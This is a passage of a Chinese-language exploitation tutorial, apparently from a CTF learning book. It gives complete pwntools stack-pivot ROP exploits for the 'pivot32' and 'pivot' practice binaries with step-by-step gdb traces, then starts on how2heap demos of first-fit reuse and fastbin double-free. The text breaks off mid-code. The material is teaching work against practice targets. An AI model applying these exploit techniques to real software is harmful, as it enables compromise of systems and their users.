io = process('./fluff')
io.recvuntil('>')
io.sendline(payload)
io.interactive()
pivot32
这是挑战的最后一题,难度突然增加。首先是动态库,动态库中函数的相对位置是固定的,所以如果我们知道其中一个函数的地址,就可以通过相对位置关系得到其他任意函数的地址。在开启 ASLR 的情况下,动态库加载到内存中的地址是变化的,但并不影响库中函数的相对位置,所以我们要想办法先泄露出某个函数的地址,从而得到目标函数地址。
通过分析我们知道该程序从动态库 libpivot32.so
中导入了函数 foothold_function()
,但在程序逻辑中并没有调用,而在 libpivot32.so
中还有我们需要的函数 ret2win()
。
现在我们知道了可以泄露的函数 foothold_function()
,那么怎么泄露呢。前面我们已经简单介绍了延时绑定技术,当我们在调用如 func@plt()
的时候,系统才会将真正的 func()
函数地址写入到 GOT 表的 func.got.plt
中,然后 func@plt()
根据 func.got.plt
跳转到真正的 func()
函数上去。
最后是该挑战最重要的部分,程序运行我们有两次输入,第一次输入被放在一个由 malloc()
函数分配的堆上,当然为了降低难度,程序特地将该地址打印了出来,第二次的输入则被放在一个大小限制为 13 字节的栈上,这个空间不足以让我们执行很多东西,所以需要运用 stack pivot,即通过覆盖调用者的 ebp,将栈帧转移到另一个地方,同时控制 eip,即可改变程序的执行流,通常的 payload(这里称为副payload) 结构如下:
buffer padding | fake ebp | leave;ret addr |
这样函数的返回地址就被覆盖为 leave;ret 指令的地址,这样程序在执行完其原本的 leave;ret 后,又执行了一次 leave;ret。
另外 fake ebp 指向我们另一段 payload(这里称为主payload) 的 ebp,即 主payload 地址减 4 的地方,当然你也可以在构造 主payload 时在前面加 4 个字节的 padding 作为 ebp:
ebp | payload
我们知道一个函数的入口点通常是:
push ebp
mov ebp,esp
leave 指令相当于:
mov esp,ebp
pop ebp
ret 指令为相当于:
pop eip
如果遇到一种情况,我们可以控制的栈溢出的字节数比较小,不能完成全部的工作,同时程序开启了 PIE 或者系统开启了 ASLR,但同时在程序的另一个地方有足够的空间可以写入 payload,并且可执行,那么我们就将栈转移到那个地方去。
完整的 exp 如下:
from pwn import *
#context.log_level = 'debug'
#context.terminal = ['konsole']
io = process('./pivot32')
elf = ELF('./pivot32')
libp = ELF('./libpivot32.so')
leave_ret = 0x0804889f
foothold_plt = elf.plt['foothold_function'] # 0x080485f0
foothold_got_plt = elf.got['foothold_function'] # 0x0804a024
pop_eax = 0x080488c0
pop_ebx = 0x08048571
mov_eax_eax = 0x080488c4
add_eax_ebx = 0x080488c7
call_eax = 0x080486a3
foothold_sym = libp.symbols['foothold_function']
ret2win_sym = libp.symbols['ret2win']
offset = int(ret2win_sym - foothold_sym) # 0x1f7
leakaddr = int(io.recv().split()[20], 16)
# calls foothold_function() to populate its GOT entry, then queries that value into EAX
#gdb.attach(io)
payload_1 = p32(foothold_plt)
payload_1 += p32(pop_eax)
payload_1 += p32(foothold_got_plt)
payload_1 += p32(mov_eax_eax)
payload_1 += p32(pop_ebx)
payload_1 += p32(offset)
payload_1 += p32(add_eax_ebx)
payload_1 += p32(call_eax)
io.sendline(payload_1)
# ebp = leakaddr-4, esp = leave_ret
payload_2 = "A"*40
payload_2 += p32(leakaddr-4) + p32(leave_ret)
io.sendline(payload_2)
print io.recvall()
这里我们在 gdb 中验证一下,在 pwnme() 函数的 leave 处下断点:
gdb-peda$ b *0x0804889f
Breakpoint 1 at 0x804889f
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0xffe7ec68 --> 0xf755cf0c --> 0x0
ESP: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EIP: 0x804889f (<pwnme+173>: leave)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048896 <pwnme+164>: call 0x80485b0 <fgets@plt>
0x804889b <pwnme+169>: add esp,0x10
0x804889e <pwnme+172>: nop
=> 0x804889f <pwnme+173>: leave
0x80488a0 <pwnme+174>: ret
0x80488a1 <uselessFunction>: push ebp
0x80488a2 <uselessFunction+1>: mov ebp,esp
0x80488a4 <uselessFunction+3>: sub esp,0x8
[------------------------------------stack-------------------------------------]
0000| 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
0004| 0xffe7ec44 ('A' <repeats 36 times>, "\f\317U\367\237\210\004\b\n")
0008| 0xffe7ec48 ('A' <repeats 32 times>, "\f\317U\367\237\210\004\b\n")
0012| 0xffe7ec4c ('A' <repeats 28 times>, "\f\317U\367\237\210\004\b\n")
0016| 0xffe7ec50 ('A' <repeats 24 times>, "\f\317U\367\237\210\004\b\n")
0020| 0xffe7ec54 ('A' <repeats 20 times>, "\f\317U\367\237\210\004\b\n")
0024| 0xffe7ec58 ('A' <repeats 16 times>, "\f\317U\367\237\210\004\b\n")
0028| 0xffe7ec5c ('A' <repeats 12 times>, "\f\317U\367\237\210\004\b\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x0804889f in pwnme ()
gdb-peda$ x/10w 0xffe7ec68
0xffe7ec68: 0xf755cf0c 0x0804889f 0xf755000a 0x00000000
0xffe7ec78: 0x00000002 0x00000000 0x00000001 0xffe7ed44
0xffe7ec88: 0xf755cf10 0xf655d010
gdb-peda$ x/10w 0xf755cf0c
0xf755cf0c: 0x00000000 0x080485f0 0x080488c0 0x0804a024
0xf755cf1c: 0x080488c4 0x08048571 0x000001f7 0x080488c7
0xf755cf2c: 0x080486a3 0x0000000a
执行第一次 leave;ret 之前,我们看到 EBP 指向 fake ebp,即 0xf755cf0c
,fake ebp 指向 主payload 的 ebp,而在 fake ebp 后面是 leave;ret 的地址 0x0804889f
,即返回地址。
执行第一次 leave:
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0xf755cf0c --> 0x0
ESP: 0xffe7ec6c --> 0x804889f (<pwnme+173>: leave)
EIP: 0x80488a0 (<pwnme+174>: ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x804889b <pwnme+169>: add esp,0x10
0x804889e <pwnme+172>: nop
0x804889f <pwnme+173>: leave
=> 0x80488a0 <pwnme+174>: ret
0x80488a1 <uselessFunction>: push ebp
0x80488a2 <uselessFunction+1>: mov ebp,esp
0x80488a4 <uselessFunction+3>: sub esp,0x8
0x80488a7 <uselessFunction+6>: call 0x80485f0 <foothold_function@plt>
[------------------------------------stack-------------------------------------]
0000| 0xffe7ec6c --> 0x804889f (<pwnme+173>: leave)
0004| 0xffe7ec70 --> 0xf755000a --> 0x0
0008| 0xffe7ec74 --> 0x0
0012| 0xffe7ec78 --> 0x2
0016| 0xffe7ec7c --> 0x0
0020| 0xffe7ec80 --> 0x1
0024| 0xffe7ec84 --> 0xffe7ed44 --> 0xffe808cf ("./pivot32")
0028| 0xffe7ec88 --> 0xf755cf10 --> 0x80485f0 (<foothold_function@plt>: jmp DWORD PTR ds:0x804a024)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488a0 in pwnme ()
EBP 的值 0xffe7ec68
被赋值给 ESP,然后从栈中弹出 0xf755cf0c
,即 fake ebp 并赋值给 EBP,同时 ESP+4=0xffe7ec6c
,指向第二次的 leave。
执行第一次 ret:
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0xf755cf0c --> 0x0
ESP: 0xffe7ec70 --> 0xf755000a --> 0x0
EIP: 0x804889f (<pwnme+173>: leave)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048896 <pwnme+164>: call 0x80485b0 <fgets@plt>
0x804889b <pwnme+169>: add esp,0x10
0x804889e <pwnme+172>: nop
=> 0x804889f <pwnme+173>: leave
0x80488a0 <pwnme+174>: ret
0x80488a1 <uselessFunction>: push ebp
0x80488a2 <uselessFunction+1>: mov ebp,esp
0x80488a4 <uselessFunction+3>: sub esp,0x8
[------------------------------------stack-------------------------------------]
0000| 0xffe7ec70 --> 0xf755000a --> 0x0
0004| 0xffe7ec74 --> 0x0
0008| 0xffe7ec78 --> 0x2
0012| 0xffe7ec7c --> 0x0
0016| 0xffe7ec80 --> 0x1
0020| 0xffe7ec84 --> 0xffe7ed44 --> 0xffe808cf ("./pivot32")
0024| 0xffe7ec88 --> 0xf755cf10 --> 0x80485f0 (<foothold_function@plt>: jmp DWORD PTR ds:0x804a024)
0028| 0xffe7ec8c --> 0xf655d010 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x0804889f in pwnme ()
EIP=0x804889f
,同时 ESP+4。
第二次 leave:
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf10 --> 0x80485f0 (<foothold_function@plt>: jmp DWORD PTR ds:0x804a024)
EIP: 0x80488a0 (<pwnme+174>: ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x804889b <pwnme+169>: add esp,0x10
0x804889e <pwnme+172>: nop
0x804889f <pwnme+173>: leave
=> 0x80488a0 <pwnme+174>: ret
0x80488a1 <uselessFunction>: push ebp
0x80488a2 <uselessFunction+1>: mov ebp,esp
0x80488a4 <uselessFunction+3>: sub esp,0x8
0x80488a7 <uselessFunction+6>: call 0x80485f0 <foothold_function@plt>
[------------------------------------stack-------------------------------------]
0000| 0xf755cf10 --> 0x80485f0 (<foothold_function@plt>: jmp DWORD PTR ds:0x804a024)
0004| 0xf755cf14 --> 0x80488c0 (<usefulGadgets>: pop eax)
0008| 0xf755cf18 --> 0x804a024 --> 0x80485f6 (<foothold_function@plt+6>: push 0x30)
0012| 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>: mov eax,DWORD PTR [eax])
0016| 0xf755cf20 --> 0x8048571 (<_init+33>: pop ebx)
0020| 0xf755cf24 --> 0x1f7
0024| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>: add eax,ebx)
0028| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>: call eax)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488a0 in pwnme ()
gdb-peda$ x/10w 0xf755cf10
0xf755cf10: 0x080485f0 0x080488c0 0x0804a024 0x080488c4
0xf755cf20: 0x08048571 0x000001f7 0x080488c7 0x080486a3
0xf755cf30: 0x0000000a 0x00000000
EBP 的值 0xf755cf0c
被赋值给 ESP,并将 主payload 的 ebp 赋值给 EBP,同时 ESP+4=0xf755cf10
,这个值正是我们 主payload 的地址。
第二次 ret:
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf14 --> 0x80488c0 (<usefulGadgets>: pop eax)
EIP: 0x80485f0 (<foothold_function@plt>: jmp DWORD PTR ds:0x804a024)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80485e0 <exit@plt>: jmp DWORD PTR ds:0x804a020
0x80485e6 <exit@plt+6>: push 0x28
0x80485eb <exit@plt+11>: jmp 0x8048580
=> 0x80485f0 <foothold_function@plt>: jmp DWORD PTR ds:0x804a024
| 0x80485f6 <foothold_function@plt+6>: push 0x30
| 0x80485fb <foothold_function@plt+11>: jmp 0x8048580
| 0x8048600 <__libc_start_main@plt>: jmp DWORD PTR ds:0x804a028
| 0x8048606 <__libc_start_main@plt+6>: push 0x38
|-> 0x80485f6 <foothold_function@plt+6>: push 0x30
0x80485fb <foothold_function@plt+11>: jmp 0x8048580
0x8048600 <__libc_start_main@plt>: jmp DWORD PTR ds:0x804a028
0x8048606 <__libc_start_main@plt+6>: push 0x38
JUMP is taken
[------------------------------------stack-------------------------------------]
0000| 0xf755cf14 --> 0x80488c0 (<usefulGadgets>: pop eax)
0004| 0xf755cf18 --> 0x804a024 --> 0x80485f6 (<foothold_function@plt+6>: push 0x30)
0008| 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>: mov eax,DWORD PTR [eax])
0012| 0xf755cf20 --> 0x8048571 (<_init+33>: pop ebx)
0016| 0xf755cf24 --> 0x1f7
0020| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>: add eax,ebx)
0024| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>: call eax)
0028| 0xf755cf30 --> 0xa ('\n')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080485f0 in foothold_function@plt ()
成功跳转到 foothold_function@plt
,接下来系统通过 _dl_runtime_resolve
等步骤,将真正的地址写入到 .got.plt
中,我们构造 gadget 泄露出该地址地址,然后计算出 ret2win()
的地址,调用它,就成功了。
地址泄露的过程:
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x54 ('T')
EBX: 0x0
ECX: 0x54 ('T')
EDX: 0xf7731854 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf18 --> 0x804a024 --> 0xf7772770 (<foothold_function>: push ebp)
EIP: 0x80488c0 (<usefulGadgets>: pop eax)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80488ba: xchg ax,ax
0x80488bc: xchg ax,ax
0x80488be: xchg ax,ax
=> 0x80488c0 <usefulGadgets>: pop eax
0x80488c1 <usefulGadgets+1>: ret
0x80488c2 <usefulGadgets+2>: xchg esp,eax
0x80488c3 <usefulGadgets+3>: ret
0x80488c4 <usefulGadgets+4>: mov eax,DWORD PTR [eax]
[------------------------------------stack-------------------------------------]
0000| 0xf755cf18 --> 0x804a024 --> 0xf7772770 (<foothold_function>: push ebp)
0004| 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>: mov eax,DWORD PTR [eax])
0008| 0xf755cf20 --> 0x8048571 (<_init+33>: pop ebx)
0012| 0xf755cf24 --> 0x1f7
0016| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>: add eax,ebx)
0020| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>: call eax)
0024| 0xf755cf30 --> 0xa ('\n')
0028| 0xf755cf34 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488c0 in usefulGadgets ()
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x804a024 --> 0xf7772770 (<foothold_function>: push ebp)
EBX: 0x0
ECX: 0x54 ('T')
EDX: 0xf7731854 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>: mov eax,DWORD PTR [eax])
EIP: 0x80488c1 (<usefulGadgets+1>: ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80488bc: xchg ax,ax
0x80488be: xchg ax,ax
0x80488c0 <usefulGadgets>: pop eax
=> 0x80488c1 <usefulGadgets+1>: ret
0x80488c2 <usefulGadgets+2>: xchg esp,eax
0x80488c3 <usefulGadgets+3>: ret
0x80488c4 <usefulGadgets+4>: mov eax,DWORD PTR [eax]
0x80488c6 <usefulGadgets+6>: ret
[------------------------------------stack-------------------------------------]
0000| 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>: mov eax,DWORD PTR [eax])
0004| 0xf755cf20 --> 0x8048571 (<_init+33>: pop ebx)
0008| 0xf755cf24 --> 0x1f7
0012| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>: add eax,ebx)
0016| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>: call eax)
0020| 0xf755cf30 --> 0xa ('\n')
0024| 0xf755cf34 --> 0x0
0028| 0xf755cf38 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488c1 in usefulGadgets ()
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x804a024 --> 0xf7772770 (<foothold_function>: push ebp)
EBX: 0x0
ECX: 0x54 ('T')
EDX: 0xf7731854 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf20 --> 0x8048571 (<_init+33>: pop ebx)
EIP: 0x80488c4 (<usefulGadgets+4>: mov eax,DWORD PTR [eax])
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80488c1 <usefulGadgets+1>: ret
0x80488c2 <usefulGadgets+2>: xchg esp,eax
0x80488c3 <usefulGadgets+3>: ret
=> 0x80488c4 <usefulGadgets+4>: mov eax,DWORD PTR [eax]
0x80488c6 <usefulGadgets+6>: ret
0x80488c7 <usefulGadgets+7>: add eax,ebx
0x80488c9 <usefulGadgets+9>: ret
0x80488ca <usefulGadgets+10>: xchg ax,ax
[------------------------------------stack-------------------------------------]
0000| 0xf755cf20 --> 0x8048571 (<_init+33>: pop ebx)
0004| 0xf755cf24 --> 0x1f7
0008| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>: add eax,ebx)
0012| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>: call eax)
0016| 0xf755cf30 --> 0xa ('\n')
0020| 0xf755cf34 --> 0x0
0024| 0xf755cf38 --> 0x0
0028| 0xf755cf3c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488c4 in usefulGadgets ()
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xf7772770 (<foothold_function>: push ebp)
EBX: 0x0
ECX: 0x54 ('T')
EDX: 0xf7731854 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf20 --> 0x8048571 (<_init+33>: pop ebx)
EIP: 0x80488c6 (<usefulGadgets+6>: ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80488c2 <usefulGadgets+2>: xchg esp,eax
0x80488c3 <usefulGadgets+3>: ret
0x80488c4 <usefulGadgets+4>: mov eax,DWORD PTR [eax]
=> 0x80488c6 <usefulGadgets+6>: ret
0x80488c7 <usefulGadgets+7>: add eax,ebx
0x80488c9 <usefulGadgets+9>: ret
0x80488ca <usefulGadgets+10>: xchg ax,ax
0x80488cc <usefulGadgets+12>: xchg ax,ax
[------------------------------------stack-------------------------------------]
0000| 0xf755cf20 --> 0x8048571 (<_init+33>: pop ebx)
0004| 0xf755cf24 --> 0x1f7
0008| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>: add eax,ebx)
0012| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>: call eax)
0016| 0xf755cf30 --> 0xa ('\n')
0020| 0xf755cf34 --> 0x0
0024| 0xf755cf38 --> 0x0
0028| 0xf755cf3c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488c6 in usefulGadgets ()
pivot
基本同上,但你可以尝试把修改 rsp 的部分也用 gadgets 来实现,这样做的好处是我们不需要伪造一个堆栈,即不用管 ebp 的地址。如:
payload_2 = "A" * 40
payload_2 += p64(pop_rax)
payload_2 += p64(leakaddr)
payload_2 += p64(xchg_rax_rsp)
实际上,我本人正是使用这种方法,因为我在构建 payload 时,0x0000000000400ae0 <+165>: leave
,leave;ret 的地址存在截断字符 0a
,这样就不能通过正常的方式写入缓冲区,当然这也是可以解决的,比如先将 0a
换成非截断字符,之后再使用寄存器将 0a
写入该地址,这也是通常解决缓冲区中截断字符的方法,但是这样做难度太大,不推荐,感兴趣的读者可以尝试一下。
$ ropgadget --binary pivot --only "mov|pop|call|add|xchg|ret"
0x0000000000400b09 : add rax, rbp ; ret
0x000000000040098e : call rax
0x0000000000400b05 : mov rax, qword ptr [rax] ; ret
0x0000000000400b00 : pop rax ; ret
0x0000000000400900 : pop rbp ; ret
0x0000000000400b02 : xchg rax, rsp ; ret
from pwn import *
#context.log_level = 'debug'
#context.terminal = ['konsole']
io = process('./pivot')
elf = ELF('./pivot')
libp = ELF('./libpivot.so')
leave_ret = 0x0000000000400adf
foothold_plt = elf.plt['foothold_function'] # 0x400850
foothold_got_plt = elf.got['foothold_function'] # 0x602048
pop_rax = 0x0000000000400b00
pop_rbp = 0x0000000000400900
mov_rax_rax = 0x0000000000400b05
xchg_rax_rsp = 0x0000000000400b02
add_rax_rbp = 0x0000000000400b09
call_rax = 0x000000000040098e
foothold_sym = libp.symbols['foothold_function']
ret2win_sym = libp.symbols['ret2win']
offset = int(ret2win_sym - foothold_sym) # 0x14e
leakaddr = int(io.recv().split()[20], 16)
# calls foothold_function() to populate its GOT entry, then queries that value into EAX
#gdb.attach(io)
payload_1 = p64(foothold_plt)
payload_1 += p64(pop_rax)
payload_1 += p64(foothold_got_plt)
payload_1 += p64(mov_rax_rax)
payload_1 += p64(pop_rbp)
payload_1 += p64(offset)
payload_1 += p64(add_rax_rbp)
payload_1 += p64(call_rax)
io.sendline(payload_1)
# rsp = leakaddr
payload_2 = "A" * 40
payload_2 += p64(pop_rax)
payload_2 += p64(leakaddr)
payload_2 += p64(xchg_rax_rsp)
io.sendline(payload_2)
print io.recvall()
这样基本的 ROP 也就介绍完了,更高级的用法会在后面的章节中再介绍,所谓的高级,也就是 gadgets 构造更加巧妙,运用操作系统的知识更加底层而已。
3.1.6 Linux 堆利用(上)
Linux 堆简介
堆是程序虚拟地址空间中的一块连续的区域,由低地址向高地址增长。当前 Linux 使用的堆分配器被称为 ptmalloc2,在 glibc 中实现。
更详细的我们已经在章节 1.5.8 中介绍了,章节 1.5.7 中也有相关内容,请回顾一下。
对堆利用来说,不用于栈上的溢出能够直接覆盖函数的返回地址从而控制 EIP,只能通过间接手段来劫持程序控制流。
how2heap
how2heap 是由 shellphish 团队制作的堆利用教程,介绍了多种堆利用技术,这篇文章我们就通过这个教程来学习。推荐使用 Ubuntu 16.04 64位系统环境,glibc 版本如下:
$ file /lib/x86_64-linux-gnu/libc-2.23.so
/lib/x86_64-linux-gnu/libc-2.23.so: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=088a6e00a1814622219f346b41e775b8dd46c518, for GNU/Linux 2.6.32, stripped
$ git clone https://github.com/shellphish/how2heap.git
$ cd how2heap
$ make
请注意,下文中贴出的代码是我简化过的,剔除和修改了一些不必要的注释和代码,以方便学习。另外,正如章节 4.3 中所讲的,添加编译参数 CFLAGS += -fsanitize=address
可以检测内存错误。下载文件
first_fit
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main() {
char* a = malloc(512);
char* b = malloc(256);
char* c;
fprintf(stderr, "1st malloc(512): %p\n", a);
fprintf(stderr, "2nd malloc(256): %p\n", b);
strcpy(a, "AAAAAAAA");
strcpy(b, "BBBBBBBB");
fprintf(stderr, "first allocation %p points to %s\n", a, a);
fprintf(stderr, "Freeing the first one...\n");
free(a);
c = malloc(500);
fprintf(stderr, "3rd malloc(500): %p\n", c);
strcpy(c, "CCCCCCCC");
fprintf(stderr, "3rd allocation %p points to %s\n", c, c);
fprintf(stderr, "first allocation %p points to %s\n", a, a);
}
$ gcc -g first_fit.c
$ ./a.out
1st malloc(512): 0x1380010
2nd malloc(256): 0x1380220
first allocation 0x1380010 points to AAAAAAAA
Freeing the first one...
3rd malloc(500): 0x1380010
3rd allocation 0x1380010 points to CCCCCCCC
first allocation 0x1380010 points to CCCCCCCC
这第一个程序展示了 glibc 堆分配的策略,即 first-fit。在分配内存时,malloc 会先到 unsorted bin(或者fastbins) 中查找适合的被 free 的 chunk,如果没有,就会把 unsorted bin 中的所有 chunk 分别放入到所属的 bins 中,然后再去这些 bins 里去找合适的 chunk。可以看到第三次 malloc 的地址和第一次相同,即 malloc 找到了第一次 free 掉的 chunk,并把它重新分配。
在 gdb 中调试,两个 malloc 之后(chunk 位于 malloc 返回地址减去 0x10 的位置):
gef➤ x/5gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000211 <-- chunk a
0x602010: 0x4141414141414141 0x0000000000000000
0x602020: 0x0000000000000000
gef➤ x/5gx 0x602220-0x10
0x602210: 0x0000000000000000 0x0000000000000111 <-- chunk b
0x602220: 0x4242424242424242 0x0000000000000000
0x602230: 0x0000000000000000
第一个 free 之后,将其加入到 unsorted bin 中:
gef➤ x/5gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000211 <-- chunk a [be freed]
0x602010: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd pointer, bk pointer
0x602020: 0x0000000000000000
gef➤ x/5gx 0x602220-0x10
0x602210: 0x0000000000000210 0x0000000000000110 <-- chunk b
0x602220: 0x4242424242424242 0x0000000000000000
0x602230: 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602000, bk=0x602000
→ Chunk(addr=0x602010, size=0x210, flags=PREV_INUSE)
[+] Found 1 chunks in unsorted bin.
第三个 malloc 之后:
gef➤ x/5gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000211 <-- chunk c
0x602010: 0x4343434343434343 0x00007ffff7dd1d00
0x602020: 0x0000000000000000
gef➤ x/5gx 0x602220-0x10
0x602210: 0x0000000000000210 0x0000000000000111 <-- chunk b
0x602220: 0x4242424242424242 0x0000000000000000
0x602230: 0x0000000000000000
所以当释放一块内存后再申请一块大小略小于的空间,那么 glibc 倾向于将先前被释放的空间重新分配。
好了,现在我们加上内存检测参数重新编译:
$ gcc -fsanitize=address -g first_fit.c
$ ./a.out
1st malloc(512): 0x61500000fd00
2nd malloc(256): 0x611000009f00
first allocation 0x61500000fd00 points to AAAAAAAA
Freeing the first one...
3rd malloc(500): 0x61500000fa80
3rd allocation 0x61500000fa80 points to CCCCCCCC
=================================================================
==4525==ERROR: AddressSanitizer: heap-use-after-free on address 0x61500000fd00 at pc 0x7f49d14a61e9 bp 0x7ffe40b526e0 sp 0x7ffe40b51e58
READ of size 2 at 0x61500000fd00 thread T0
#0 0x7f49d14a61e8 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x601e8)
#1 0x7f49d14a6bcc in vfprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x60bcc)
#2 0x7f49d14a6cf9 in fprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x60cf9)
#3 0x400b8b in main /home/firmy/how2heap/first_fit.c:23
#4 0x7f49d109c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#5 0x400878 in _start (/home/firmy/how2heap/a.out+0x400878)
0x61500000fd00 is located 0 bytes inside of 512-byte region [0x61500000fd00,0x61500000ff00)
freed by thread T0 here:
#0 0x7f49d14de2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
#1 0x400aa2 in main /home/firmy/how2heap/first_fit.c:17
#2 0x7f49d109c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
previously allocated by thread T0 here:
#0 0x7f49d14de602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x400957 in main /home/firmy/how2heap/first_fit.c:6
#2 0x7f49d109c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
一个很明显的 use-after-free 漏洞。关于这类漏洞的详细利用过程,我们会在后面的章节里再讲。
fastbin_dup
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main() {
fprintf(stderr, "Allocating 3 buffers.\n");
char *a = malloc(9);
char *b = malloc(9);
char *c = malloc(9);
strcpy(a, "AAAAAAAA");
strcpy(b, "BBBBBBBB");
strcpy(c, "CCCCCCCC");
fprintf(stderr, "1st malloc(9) %p points to %s\n", a, a);
fprintf(stderr, "2nd malloc(9) %p points to %s\n", b, b);
fprintf(stderr, "3rd malloc(9) %p points to %s\n", c, c);
fprintf(stderr, "Freeing the first one %p.\n", a);
free(a);
fprintf(stderr, "Then freeing another one %p.\n", b);
free(b);
fprintf(stderr, "Freeing the first one %p again.\n", a);
free(a);
fprintf(stderr, "Allocating 3 buffers.\n");
char *d = malloc(9);
char *e = malloc(9);
char *f = malloc(9);
strcpy(d, "DDDDDDDD");
